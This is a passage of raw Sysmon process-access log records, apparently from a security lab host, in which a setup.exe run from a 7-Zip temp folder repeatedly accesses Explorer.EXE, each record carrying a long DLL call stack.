\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 